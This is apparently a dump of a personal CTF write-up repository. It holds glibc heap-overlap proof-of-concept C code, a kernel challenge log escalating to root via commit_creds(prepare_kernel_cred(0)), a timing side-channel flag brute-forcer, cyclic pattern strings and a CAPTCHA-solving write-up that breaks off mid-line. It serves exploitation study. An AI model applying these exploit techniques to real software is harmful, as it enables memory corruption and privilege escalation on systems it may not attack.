Nonadjacent Free Chunk Consolidation Attack 20 | 21 | use [consol_poc1.c](consol_poc1.c) 22 | 23 | 24 | ```C++ 25 | void *V = malloc(0x18); // vulnerable object 26 | void *A = malloc(0xf0); // chunk size 0x100, not fastbin 27 | char *T = (char*)malloc(0x10); // target 28 | void *B = malloc(0xf0); // chunk size 0x100, not fastbin 29 | ``` 30 | ![alt text](image/04_01.png) 31 | 32 | ```C++ 33 | free(B); 34 | ``` 35 | ![alt text](image/04_02.png) 36 | 37 | ```C++ 38 | memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120 39 | ``` 40 | ![alt text](image/04_03.png) 41 | ```C++ 42 | free(A); // force nonadjacent consolidation with B 43 | char *C = (char*)malloc(0x110); // malloc C, overlapping T 44 | ``` 45 | ![alt text](image/04_04.png) 46 | ```C++ 47 | strcpy(C+0x100, "Corrupted!"); 48 | ``` 49 | ![alt text](image/04_05.png) 50 | -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/shrink_poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | char *V = (char*)malloc(0x18); //vulnerable object 8 | void *A = malloc(0x400); // chunk size 0x410, not fastbin 9 | void *B = malloc(0xf0); // chunk size 0x100, not fastbin 10 | free(A); 11 | strcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA"); //null byte off by 1, shrink size of A to 0x400 12 | void *A1 = malloc(0xf0); 13 | char *T = (char*)malloc(0x10); // target 14 | strcpy(T, "Target"); 15 | printf("T: %s\n", T); 16 | free(A1); 17 | free(B); // force consolidation with A1 18 | char *C = (char*)malloc(0x400); // malloc C, overlapping T 19 | strcpy(C+0x100, "Corrupted!"); 20 | printf("T: %s\n", T); 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /heap/reference/20170604ssmjp-170604135916.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/20170604ssmjp-170604135916.pdf -------------------------------------------------------------------------------- /heap/reference/Glibc_Adventures-The_Forgotten_Chunks.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/Glibc_Adventures-The_Forgotten_Chunks.pdf -------------------------------------------------------------------------------- /heap/reference/bh-usa-07-ferguson-WP.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/bh-usa-07-ferguson-WP.pdf -------------------------------------------------------------------------------- /heap/reference/glibcmalloc-110710054847-phpapp01.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/glibcmalloc-110710054847-phpapp01.ppt -------------------------------------------------------------------------------- /heap/reference/glibc内存管理ptmalloc源代码分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/glibc内存管理ptmalloc源代码分析.pdf -------------------------------------------------------------------------------- /heap/reference/malloc-150821074656-lva1-app6891.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/malloc-150821074656-lva1-app6891.pdf -------------------------------------------------------------------------------- /heap/reference/ptmalloc_camera.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/ptmalloc_camera.pdf -------------------------------------------------------------------------------- /heap/reference/readme.md: -------------------------------------------------------------------------------- 1 | https://www.win.tue.nl/~aeb/linux/hh/hh-11.html 2 | 3 | http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/ 4 | 5 | https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware 6 | 7 | https://papers.put.as/papers/macosx/2016/Summercon-2016.pdf 8 | 9 | https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/jia 10 | -------------------------------------------------------------------------------- /hidden_writing.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | #ice_ctf also got one 3 | 4 | import Image 5 | 6 | img = Image.open('ifs.bmp') 7 | 8 | X = img.size[0] 9 | Y = img.size[1] 10 | 11 | print X,Y 12 | 13 | for i in range(X-2): 14 | for j in range(Y-2): 15 | a = img.getpixel((i,j))[0]+img.getpixel((i,j))[1]+img.getpixel((i,j))[2] 16 | b = img.getpixel((i,j+1))[0]+img.getpixel((i,j+1))[1]+img.getpixel((i,j+1))[2] 17 | c = img.getpixel((i,j+2))[0]+img.getpixel((i,j+2))[1]+img.getpixel((i,j+2))[2] 18 | if (a > b and c > b) or (a < b and c < b): 19 | pass 20 | else: 21 | img.putpixel((i,j),(255,255,255)) 22 | 23 | img.show() 24 | -------------------------------------------------------------------------------- /kernel/hacklu_2018_babykernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/kernel/hacklu_2018_babykernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.7z -------------------------------------------------------------------------------- /kernel/hacklu_2018_babykernel/readme.md: -------------------------------------------------------------------------------- 1 | Finding address to call commit_creds(prepare_kernel_cred(0)); and make it become root 2 | 3 | Reference: 4 | 5 | https://devcraft.io/2018/04/25/blazeme-blaze-ctf-2018.html 6 | 7 | 8 | Solving logs: 9 | 10 | ``` 11 | qemu-system-x86_64 -monitor /dev/null -m 64 -nographic -kernel "bzImage" -initrd initrd.cpio -append "console=ttyS0 init='/init'" 12 | 13 | 14 | ffffffff8104602b: e8 20 8e 00 00 callq ffffffff8104ee50 15 | 0xffffffff8104ee50 : 16 | 18446744071579168336 17 | 18 | 19 | ffffffff8103c0fe: e8 cd 28 01 00 callq ffffffff8104e9d0 20 | 21 | 22 | 18446744071579167184 23 | 24 | ffff88000212c000 25 | 26 | ----- Menu ----- 27 | 1. Call 28 | 2. Show me my uid 29 | 3. Read file 30 | 4. Any hintz? 31 | 5. Bye! 32 | > 1 33 | 1 34 | I need a kernel address to call. Be careful, though or we will crash horribly... 35 | > 36 | 18446744071579168336 37 | 18446744071579168336 38 | There is a good chance we will want to pass an argument. Which one is it? 39 | > 40 | 0 41 | 0 42 | random: fast init done 43 | Got call address: 0xffffffff8104ee50, argument: 0x0000000000000000 44 | flux_baby ioctl nr 900 called 45 | flux_baby ioctl nr 900 called 46 | flux_baby ioctl extracted param ffffffff8104ee50 as function ptr, calling it 47 | A miracle happened. We came back without crashing! I even got a return value for you. 48 | It is: ffff88000212cb40 49 | ----- Menu ----- 50 | 1. Call 51 | 2. Show me my uid 52 | 3. Read file 53 | 4. Any hintz? 54 | 5. Bye! 55 | > 1 56 | 1 57 | I need a kernel address to call. Be careful, though or we will crash horribly... 58 | > 59 | 18446744071579167184 60 | 18446744071579167184 61 | There is a good chance we will want to pass an argument. Which one is it? 62 | > 63 | 18446612132349004608 64 | 18446612132349004608 65 | Got call address: 0xffffffff8104e9d0, argument: 0xffff88000212cb40 66 | flux_baby ioctl nr 900 called 67 | flux_baby ioctl nr 900 called 68 | flux_baby ioctl extracted param ffffffff8104e9d0 as function ptr, calling it 69 | A miracle happened. We came back without crashing! I even got a return value for you. 70 | It is: 0000000000000000 71 | ----- Menu ----- 72 | 1. Call 73 | 2. Show me my uid 74 | 3. Read file 75 | 4. Any hintz? 76 | 5. Bye! 77 | > 2 78 | 2 79 | uid=0(root) gid=0(root) 80 | ----- Menu ----- 81 | 1. Call 82 | 2. Show me my uid 83 | 3. Read file 84 | 4. Any hintz? 85 | 5. Bye! 86 | > 3 87 | 3 88 | Which file are we trying to read? 89 | > ./flag 90 | ./flag 91 | Here are your 0x40 bytes contents: 92 | flag{well_done_this_is_how_every_kernel_exploit_eventually_goes} 93 | ----- Menu ----- 94 | 1. Call 95 | 2. Show me my uid 96 | 3. Read file 97 | 4. Any hintz? 98 | 5. Bye! 99 | ``` 100 | -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/1.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/2.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/3.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/4.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/ida.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/nanase.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/nanase.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/readme.md: -------------------------------------------------------------------------------- 1 | # SHA2017 CTF Rev100 Suspect File 1 2 | 3 | **Description:** 4 | 5 | >Suspect File 1 (100) - 63 solves 6 | > 7 | >We found some software on our suspects development server, it looks like they created some different versions, are you able to crack the >software? 8 | > 9 | >Challenge created by the Digital and Biometric Traces division of the Netherlands Forensic Institute. 10 | > [suspectfile1.tgz](./suspectfile1.tgz) 220f680d2b441c43163065dc779a450b 11 | 12 | # Writeup 13 | 14 | 第一次寫writeup,呢條只係sanity check,然而我用左1個鐘頭寫同debug angr script,再用左個半鐘頭 update angr :0) 15 | 16 | 首先Ida 左佢先 17 | 18 | ![alt text](ida.png) 19 | 20 | 見到都反胃x_x 21 | 22 | F5 code 23 | Conditions for output "Yes!" 24 | 25 | ```C++ 26 | ......... 27 | } 28 | while ( v10 != -915395067 ); 29 | puts("Yes!"); 30 | return 0; 31 | } 32 | 33 | 34 | ``` 35 | 由於冇scanf,估計要pass一個argv令v10==-915395067 36 | 37 | 38 | gdb係sorry() set breakpoint 39 | 40 | ![alt text](1.png) 41 | 42 | call sorry()之前嘅stack 43 | 44 | ![alt text](2.png) 45 | 46 | pass左一個事實落去做argv 47 | 48 | ![alt text](3.png) 49 | 50 | 唔小心汁走左支flag ^_^ 51 | 52 | ![alt text](4.png) 53 | 54 | 七瀨大法好 55 | 56 | ![alt text](nanase.png) 57 | 58 | 估計係因為中間太多while,所以angr爆炸,估計要z3解先得 59 | 60 | 唉 終於解到題~~~~~~~ 61 | 62 | -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/suspectfile1.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/suspectfile1.tgz -------------------------------------------------------------------------------- /misc/VXCTF 2nd Flag Checking Oracle 2/fco_v2.0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import random 3 | import sys 4 | import os 5 | import time 6 | 7 | f = open("flag.txt", "r") 8 | flag = f.read() 9 | 10 | print """ 11 | Welcome to the flag checking oracle. You can check if your flag is the same as 12 | mine! Previous version has a bug and was already fixed now! Same as before, I 13 | will not let you to brute force that easily... Enjoy and Wait alone!HAHA! 14 | """ 15 | 16 | while 1: 17 | print "Enter your guess:" 18 | x = sys.stdin.readline()[:-1] 19 | match = True 20 | while(len(x)!=len(flag)): 21 | print "Wrong! Try again." 22 | print "Enter your guess:" 23 | x = sys.stdin.readline()[:-1] 24 | for i in range(len(x)): 25 | time.sleep(0.5) 26 | if x[i] != flag[i]: 27 | match = False 28 | print "Wrong! Try again." 29 | break 30 | if match == True: 31 | break 32 | 33 | print "Correct!" 34 | -------------------------------------------------------------------------------- /misc/VXCTF 2nd Flag Checking Oracle 2/readme.md: -------------------------------------------------------------------------------- 1 | # VXCTF 2nd Flag Checking Oracle 2 2 | 3 | 4 | # 題目: 5 | 6 | >Flag Checking Oracle 2 7 | >Last time there is a bug in our flag checking oracle. This time the bug is fixed, what can you do? Hahahaaa 8 | > 9 | > 10 | >[fco_v2.0.py](fco_v2.0.py) 11 | 12 | 13 | 題目好簡單,不過係打script麻煩d 14 | 15 | 睇code大概知道 16 | 17 | 1.如果input length 等於flag length,會多左0.5秒sleeping time 18 | 19 | 2.每中一隻字,會roughly 多0.5秒sleeping time 20 | 21 | 22 | 經過出題人少少提示,我發現原來pwntools有計latency嘅tools,經過幾次trial and error就開始send server 23 | 24 | 等大約個半鐘就有flag 25 | 26 | # Code: 27 | 28 | [solve.py](solve.py) 29 | -------------------------------------------------------------------------------- /misc/VXCTF 2nd Flag Checking Oracle 2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | host = "58.152.223.96" 5 | port = 8001 6 | 7 | 8 | #vxctf{3nj0y_4nd_w417_a10ne} 9 | 10 | r = remote(host,port) 11 | 12 | char_set="!@#$%^&*()-_0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 13 | 14 | payload='vxctf{3nj0y_4nd_w417_1XAAA}' 15 | 16 | 17 | 18 | #start from 6 19 | correct=19 20 | 21 | wrong=27-correct 22 | 23 | r.recvuntil('Enter your guess:') 24 | r.sendline(payload) 25 | 26 | #got0.1s latency 27 | char_pointer=0 28 | 29 | while(wrong): 30 | 31 | if(r.recvuntil('Wrong! Try again.',timeout=((0.6)+correct*0.5))==''): 32 | 33 | char_pointer=0 34 | correct+=1 35 | wrong-=1 36 | 37 | print payload 38 | r.recvuntil('Enter your guess:') 39 | r.sendline(payload) 40 | 41 | 42 | 43 | else: 44 | 45 | 46 | payload=payload[:correct]+char_set[char_pointer]+payload[correct+1:] 47 | 48 | char_pointer+=1 49 | 50 | print payload+' failed' 51 | 52 | r.recvuntil('Enter your guess:') 53 | 54 | r.sendline(payload) 55 | 56 | 57 | 58 | 59 | ##27 60 | -------------------------------------------------------------------------------- /misc/polictf2017 Status box-120/statusbox.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from time import* 3 | 4 | host = "statusbox.chall.polictf.it" 5 | port = 31337 6 | 7 | s = remote(host,port) 8 | ##flag{g00d_0ld_m1ss1ng_ch3cks!} 9 | ##while 14 time 10 | count=0 11 | while(1): 12 | 13 | print s.recv(4096) 14 | 15 | 16 | s.sendline("3") 17 | 18 | print s.recv(4096) 19 | 20 | 21 | s.send("\n") 22 | 23 | print s.recv(4096) 24 | 25 | s.sendline("0") 26 | 27 | count+=1 28 | #payload="a"*1023 29 | 30 | 31 | print "-----------------------ok-----------------------" 32 | 33 | print count 34 | sleep(1) 35 | 36 | s.interactive() 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /pattc_list.txt: -------------------------------------------------------------------------------- 1 | pattc 50: 2 | AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA 3 | 4 | pattc 80: 5 | AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4A 6 | 7 | pattc 100: 8 | AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL 9 | 10 | pattc 120: 11 | AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAA 12 | 13 | pattc 150: 14 | AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA 15 | 16 | 17 | pattc 200: 18 | AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA 19 | 20 | 21 | pattc 300: 22 | AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A% 23 | -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/0.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/1.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/10.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/10.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/11.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/11.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/12.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/12.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/13.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/13.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/14.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/14.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/15.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/15.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/2.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/3.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/4.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/5.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/6.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/7.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/8.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/9.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/9.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/FDSEJ.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/FDSEJ.png -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/JGGSS.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/JGGSS.png -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/JPSCB.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/JPSCB.png -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/PTJYZ.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/PTJYZ.png -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/UZNXF_54629.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/UZNXF_54629.png -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/VJGJJ.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/VJGJJ.png -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/YJKYY.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/YJKYY.png -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/chall.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/chall.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/charset.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/charset.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/comment.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/comment.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/ensemble_learning.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/ensemble_learning.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/failure.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/failure.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/lv169.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/lv169.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/lv225.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/lv225.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/mainpage.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/mainpage.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/model1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/model1.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/readme.md: -------------------------------------------------------------------------------- 1 | ![alt text](0.jpg) 2 | 3 | ``` 4 | Challenge 5 | 4 Solves 6 | Bot Protection IV 7 | Point Value: 500 8 | Challenge Description 9 | When on website: +1 spam resistance +10 user annoyance 10 | 11 | Gotta be fast! 500 in 10 minutes! 12 | 13 | https://captcha.chal.uiuc.tf 14 | 15 | Author: tow_nater 16 | 17 | ``` 18 | 19 | ![alt text](chall.jpg) 20 | 21 | ![alt text](1.jpg) 22 | 23 | ![alt text](mainpage.jpg) 24 | 25 | ![alt text](2.jpg) 26 | 27 | ![alt text](charset.jpg) 28 | 29 | ![alt text](3.jpg) 30 | 31 | ![alt text](comment.jpg) 32 | 33 | 34 | ```html 35 | 36 | ``` 37 | 38 | ![alt text](4.jpg) 39 | 40 | ![alt text](unzip.jpg) 41 | 42 | 43 | ![alt text](5.jpg) 44 | 45 | ![alt text](UZNXF_54629.png) 46 | 47 | ![alt text](6.jpg) 48 | 49 | ```json 50 | { 51 | "origin_image_dir": "/home/xxx/solve/captchas/", 52 | "new_image_dir": "/home/xxx/solve/new_train/", 53 | "train_image_dir": "/home/xxx/solve/train/", 54 | "test_image_dir": "/home/xxx/solve/test/", 55 | "api_image_dir": "sample/api/", 56 | "online_image_dir": "sample/online/", 57 | "local_image_dir": "sample/local/", 58 | "model_save_dir": "model_v8/", 59 | "image_width": 250, 60 | "image_height": 75, 61 | "max_captcha": 5, 62 | "image_suffix": "png", 63 | "char_set": "ABCDEFGHIJKLMNOPQRSTUVWXYZ", 64 | "use_labels_json_file": false, 65 | "remote_url": "http://127.0.0.1:6100/captcha/", 66 | "cycle_stop": 20000, 67 | "acc_stop": 0.99, 68 | "cycle_save": 500, 69 | "enable_gpu": 1, 70 | "train_batch_size": 32, 71 | "test_batch_size": 32 72 | } 73 | 74 | 75 | ``` 76 | 77 | ![alt text](7.jpg) 78 | 79 | ![alt text](model1.jpg) 80 | 81 | 82 | ![alt text](8.jpg) 83 | 84 | ![alt text](ensemble_learning.jpg) 85 | 86 | ![alt text](9.jpg) 87 | 88 | ![alt text](lv169.jpg) 89 | 90 | ![alt text](10.jpg) 91 | 92 | ![alt text](lv225.jpg) 93 | 94 | ![alt text](11.jpg) 95 | 96 | ![alt 